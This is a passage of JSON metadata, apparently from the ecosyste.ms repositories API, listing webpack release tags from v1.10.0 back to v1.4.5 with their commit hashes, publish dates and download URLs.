bpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{